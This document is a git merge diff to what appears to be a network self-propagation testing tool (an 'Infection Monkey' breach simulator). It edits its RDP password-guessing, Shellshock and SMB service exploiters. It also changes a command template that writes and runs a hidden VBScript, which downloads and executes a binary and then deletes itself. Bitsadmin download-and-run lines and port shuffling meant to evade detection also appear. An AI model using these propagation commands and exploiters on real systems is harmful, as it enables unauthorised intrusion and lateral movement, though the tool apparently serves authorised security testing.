Merge remote-tracking branch 'origin/master'

2016-09-08 10:21:47 +03:00 · 2016-09-08 10:21:47 +03:00 · 6fcf8b2f15
parent 24792aec61 d2203b2220
commit 6fcf8b2f15
9 changed files with 32 additions and 8 deletions
--- a/chaos_monkey/config.py
+++ b/chaos_monkey/config.py
@ -208,6 +208,8 @@ class Configuration(object):

    # smb/wmi exploiter
    smb_download_timeout = 300 # timeout in seconds
+    smb_service_name = "InfectionMonkey"
+

    # system info collection
    collect_system_info = True
--- a/chaos_monkey/example.conf
+++ b/chaos_monkey/example.conf
@ -66,6 +66,7 @@
    "range_size": 30,
    "rdp_use_vbs_download": true,
    "smb_download_timeout": 300,
+    "smb_service_name": "InfectionMonkey",
    "retry_failed_explotation": true,
    "scanner_class": "TcpScanner",
    "self_delete_in_cleanup": true,
--- a/chaos_monkey/exploit/rdpgrinder.py
+++ b/chaos_monkey/exploit/rdpgrinder.py
@ -103,6 +103,7 @@ class KeyPressRDPClient(rdp.RDPClientObserver):
        self._update_lock.release()

    def _keysSender(self):
+        LOG.debug("Starting to send keystrokes")
        while True:

            if self.closed:
@ -260,6 +261,8 @@ class RdpExploiter(HostExploiter):
            LOG.debug("Exploiter RdpGrinder failed, http transfer creation failed.")
            return False

+        LOG.info("Started http server on %s", http_path)
+
        cmdline = build_monkey_commandline(host, depth-1)

        if self._config.rdp_use_vbs_download:
@ -286,9 +289,11 @@ class RdpExploiter(HostExploiter):
        for password in passwords:
            try:
                # run command using rdp.
-                LOG.info("Trying rdp logging into victim %r with user %s and password '%s'",
+                LOG.info("Trying RDP logging into victim %r with user %s and password '%s'",
                         host, self._config.psexec_user, password)

+                LOG.info("RDP logged in to %r", host)
+
                client_factory = CMDClientFactory(self._config.psexec_user, password, "", command)

                reactor.callFromThread(reactor.connectTCP, host.ip_addr, RDP_PORT, client_factory)
--- a/chaos_monkey/exploit/shellshock.py
+++ b/chaos_monkey/exploit/shellshock.py
@ -92,7 +92,6 @@ class ShellShockExploiter(HostExploiter):
                    LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
                    return False

-
            # copy the monkey
            dropper_target_path_linux = self._config.dropper_target_path_linux
            if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
@ -193,7 +192,7 @@ class ShellShockExploiter(HostExploiter):
        Checks if which urls exist
        :return: Sequence of URLs to try and attack
        """
-        import grequests
+        import grequests # at this point, it monkey patches half the world and we must stop it
        attack_path = 'http://'
        if is_https:
            attack_path = 'https://'
@ -203,6 +202,10 @@ class ShellShockExploiter(HostExploiter):
        resps = grequests.map(reqs, size=15)
        valid_resps = [resp for resp in resps if resp and resp.status_code == requests.codes.ok]
        urls = [resp.url for resp in valid_resps]
+
+        # revert monkey patch
+        import socket # this is the monkeypatched socket module
+        reload(socket)
        return urls

    @staticmethod
--- a/chaos_monkey/exploit/smbexec.py
+++ b/chaos_monkey/exploit/smbexec.py
@ -141,7 +141,7 @@ class SmbExploiter(HostExploiter):
        sc_handle = resp['lpScHandle']

        # start the monkey using the SCM
-        resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, "Chaos Monkey", "Chaos Monkey",
+        resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, self._config.smb_service_name, self._config.smb_service_name,
                                     lpBinaryPathName=cmdline)
        service = resp['lpServiceHandle']

--- a/chaos_monkey/model/init.py
+++ b/chaos_monkey/model/init.py
@ -10,5 +10,5 @@ DROPPER_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER
 MONKEY_CMDLINE_DETACHED = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
 MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, )
 RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s'  % (MONKEY_ARG, )
-RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>!o!&@echo objXMLHTTP.open "GET","%%(http_path)s",false>>!o!&@echo objXMLHTTP.send()>>!o!&@echo If objXMLHTTP.Status=200 Then>>!o!&@echo Set objADOStream=CreateObject("ADODB.Stream")>>!o!&@echo objADOStream.Open>>!o!&@echo objADOStream.Type=1 >>!o!&@echo objADOStream.Write objXMLHTTP.ResponseBody>>!o!&@echo objADOStream.Position=0 >>!o!&@echo objADOStream.SaveToFile "%%(monkey_path)s">>!o!&@echo objADOStream.Close>>!o!&@echo Set objADOStream=Nothing>>!o!&@echo End if>>!o!&@echo Set objXMLHTTP=Nothing>>!o!&@echo Set objShell=CreateObject("WScript.Shell")>>!o!&@echo objShell.Run "%%(monkey_path)s %s %%(parameters)s", 0, false>>!o!&start /b cmd /c cscript.exe //E:vbscript !o!^&del /f /q !o!' % (MONKEY_ARG, )
+RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObject("WinHttp.WinHttpRequest.5.1")>!o!&@echo objXMLHTTP.open "GET","%%(http_path)s",false>>!o!&@echo objXMLHTTP.send()>>!o!&@echo If objXMLHTTP.Status=200 Then>>!o!&@echo Set objADOStream=CreateObject("ADODB.Stream")>>!o!&@echo objADOStream.Open>>!o!&@echo objADOStream.Type=1 >>!o!&@echo objADOStream.Write objXMLHTTP.ResponseBody>>!o!&@echo objADOStream.Position=0 >>!o!&@echo objADOStream.SaveToFile "%%(monkey_path)s">>!o!&@echo objADOStream.Close>>!o!&@echo Set objADOStream=Nothing>>!o!&@echo End if>>!o!&@echo Set objXMLHTTP=Nothing>>!o!&@echo Set objShell=CreateObject("WScript.Shell")>>!o!&@echo objShell.Run "%%(monkey_path)s %s %%(parameters)s", 0, false>>!o!&start /b cmd /c cscript.exe //E:vbscript !o!^&del /f /q !o!' % (MONKEY_ARG, )
 DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
--- a/chaos_monkey/network/tcp_scanner.py
+++ b/chaos_monkey/network/tcp_scanner.py
@ -1,4 +1,5 @@
 import time
+from random import shuffle
 from network import HostScanner, HostFinger
 from model.host import VictimHost
 from network.tools import check_port_tcp
@ -19,8 +20,11 @@ class TcpScanner(HostScanner, HostFinger):
        assert isinstance(host, VictimHost)

        count = 0
+        # maybe hide under really bad detection systems
+        target_ports = self._config.tcp_target_ports[:]
+        shuffle(target_ports)

-        for target_port in self._config.tcp_target_ports:
+        for target_port in target_ports:

            is_open, banner = check_port_tcp(host.ip_addr,
                                             target_port,
--- a/monkey_business/cc/main.py
+++ b/monkey_business/cc/main.py
@ -315,4 +315,12 @@ api.add_resource(Connector, '/connector')
 api.add_resource(JobCreation, '/jobcreate')

 if __name__ == '__main__':
-    app.run(host='0.0.0.0', debug=True, ssl_context=('server.crt', 'server.key'))
+    from tornado.wsgi import WSGIContainer
+    from tornado.httpserver import HTTPServer
+    from tornado.ioloop import IOLoop
+
+    http_server = HTTPServer(WSGIContainer(app), ssl_options={'certfile': 'server.crt', 'keyfile': 'server.key'})
+    http_server.listen(5000)
+    IOLoop.instance().start()
+
+    #app.run(host='0.0.0.0', debug=True, ssl_context=('server.crt', 'server.key'))
--- a/monkey_business/requirements.txt
+++ b/monkey_business/requirements.txt
@ -1,3 +1,4 @@
 pyVmomi
 celery
-celery[mongodb]
+celery[mongodb]
+tornado